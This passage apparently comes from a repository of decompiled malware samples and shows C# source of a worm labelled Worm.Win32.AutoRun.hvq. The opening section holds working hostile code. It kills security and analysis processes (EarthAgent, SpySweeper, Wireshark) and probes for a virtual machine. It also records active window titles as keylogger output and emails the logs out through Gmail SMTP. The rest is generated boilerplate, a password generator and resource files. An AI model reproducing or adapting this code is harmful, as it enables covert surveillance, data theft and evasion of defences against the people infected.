label_11:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public void searvearproetektnyu()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void spieseweapalucard()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public bool veeemchekmustang()
{
string userName = Environment.UserName;
object[] objArray = new object[1]
{
(object) "SELECT * FROM Win32_VideoController"
};
if (new bool[1]{ true }[0])
Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objArray[0]))), typeof (string)));
bool flag;
return flag;
}
public void wyresharkehavok()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
private string GetActiveWindowTitle()
{
string lpString = new string(char.MinValue, 100);
Form1.GetWindowText(Form1.GetForegroundWindow(), ref lpString, 100);
return lpString.Substring(0, checked (Strings.InStr(lpString, "\0") - 1));
}
private void Timer2_Tick(object sender, EventArgs e)
{
try
{
new SmtpClient("smtp.gmail.com")
{
EnableSsl = true,
Credentials = ((ICredentialsByHost) new NetworkCredential(this.Settings[1], this.Settings[2])),
Port = 587
}.Send(new MailMessage()
{
Subject = "[Dscreet Logs] - ",
To = {
this.Settings[1]
},
From = new MailAddress(this.Settings[1]),
Body = this.TextBox1.Text
});
this.TextBox1.Clear();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public string FileName(string FullPath) => Path.GetFileName(FullPath);
private void Timer1_Tick(object sender, EventArgs e)
{
if (Operators.CompareString(this.str1n, this.GetActiveWindowTitle(), false) == 0)
return;
this.TextBox1.Text = this.TextBox1.Text + "\r\n[-- " + this.GetActiveWindowTitle() + " --]\r\n";
this.str1n = this.GetActiveWindowTitle();
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/My/MyApplication.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
[STAThread]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/My/MyProject.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/My/MySettings.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: My.MySettings
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MySettingsProperty
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace My
{
[StandardModule]
[HideModuleName]
[CompilerGenerated]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: My.Resources.Resources
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace My.Resources
{
[CompilerGenerated]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) My.Resources.Resources.resourceMan, (object) null))
My.Resources.Resources.resourceMan = new ResourceManager(nameof (Resources), typeof (My.Resources.Resources).Assembly);
return My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => My.Resources.Resources.resourceCulture;
set => My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/Pass.cs
+107
View File
@@ -0,0 +1,107 @@
// Decompiled with JetBrains decompiler
// Type: Pass
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Security.Cryptography;
[StandardModule]
internal sealed class Pass
{
public class RandomPassword
{
private static int DEFAULT_MIN_PASSWORD_LENGTH = 8;
private static int DEFAULT_MAX_PASSWORD_LENGTH = 10;
private static string PASSWORD_CHARS_LCASE = "abcdefgijkmnopqrstwxyz";
private static string PASSWORD_CHARS_UCASE = "ABCDEFGHJKLMNPQRSTWXYZ";
private static string PASSWORD_CHARS_NUMERIC = "0123456789";
private static string PASSWORD_CHARS_SPECIAL = "*$-+?_&=!%{}/";
[DebuggerNonUserCode]
public RandomPassword()
{
}
public static string Generate() => Pass.RandomPassword.Generate(Pass.RandomPassword.DEFAULT_MIN_PASSWORD_LENGTH, Pass.RandomPassword.DEFAULT_MAX_PASSWORD_LENGTH);
public static string Generate(int length) => Pass.RandomPassword.Generate(length, length);
public static string Generate(int minLength, int maxLength)
{
if (minLength <= 0 | maxLength <= 0 | minLength > maxLength)
;
char[][] chArray1 = new char[4][]
{
Pass.RandomPassword.PASSWORD_CHARS_LCASE.ToCharArray(),
Pass.RandomPassword.PASSWORD_CHARS_UCASE.ToCharArray(),
Pass.RandomPassword.PASSWORD_CHARS_NUMERIC.ToCharArray(),
Pass.RandomPassword.PASSWORD_CHARS_SPECIAL.ToCharArray()
};
int[] numArray1 = new int[checked (chArray1.Length - 1 + 1)];
int num1 = checked (numArray1.Length - 1);
int index1 = 0;
while (index1 <= num1)
{
numArray1[index1] = chArray1[index1].Length;
checked { ++index1; }
}
int[] numArray2 = new int[checked (chArray1.Length - 1 + 1)];
int num2 = checked (numArray2.Length - 1);
int index2 = 0;
while (index2 <= num2)
{
numArray2[index2] = index2;
checked { ++index2; }
}
byte[] data = new byte[4];
new RNGCryptoServiceProvider().GetBytes(data);
Random random = new Random(((int) data[0] & (int) sbyte.MaxValue) << 24 | (int) (byte) ((uint) data[1] << 0) | (int) (byte) ((uint) data[2] << 0) | (int) data[3]);
char[] chArray2 = minLength >= maxLength ? new char[checked (minLength - 1 + 1)] : new char[checked (random.Next(minLength - 1, maxLength) + 1)];
int maxValue = checked (numArray2.Length - 1);
int num3 = checked (chArray2.Length - 1);
int index3 = 0;
while (index3 <= num3)
{
int index4 = maxValue != 0 ? random.Next(0, maxValue) : 0;
int index5 = numArray2[index4];
int index6 = checked (numArray1[index5] - 1);
int index7 = index6 != 0 ? random.Next(0, checked (index6 + 1)) : 0;
chArray2[index3] = chArray1[index5][index7];
if (index6 == 0)
{
numArray1[index5] = chArray1[index5].Length;
}
else
{
if (index6 != index7)
{
char ch = chArray1[index5][index6];
chArray1[index5][index6] = chArray1[index5][index7];
chArray1[index5][index7] = ch;
}
numArray1[index5] = checked (numArray1[index5] - 1);
}
if (maxValue == 0)
{
maxValue = checked (numArray2.Length - 1);
}
else
{
if (maxValue != index4)
{
int num4 = numArray2[maxValue];
numArray2[maxValue] = numArray2[index4];
numArray2[index4] = num4;
}
checked { --maxValue; }
}
checked { ++index3; }
}
return new string(chArray2);
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/RandomPassword.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/ResourceReader.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: ResourceReader
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
[StandardModule]
internal sealed class ResourceReader
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
public static byte[] ReadResource(string filename)
{
IntPtr moduleHandle = ResourceReader.GetModuleHandle(ref filename);
IntPtr resource = ResourceReader.FindResource(moduleHandle, "0", "RT_RCDATA");
IntPtr source = ResourceReader.LoadResource(moduleHandle, resource);
int length = ResourceReader.SizeofResource(moduleHandle, resource);
byte[] destination = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, destination, 0, length);
return destination;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-b4e08d063731bcd4e24e51e4eaa0b9d4f13fad74fdaaefae78fc5583932f35af/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
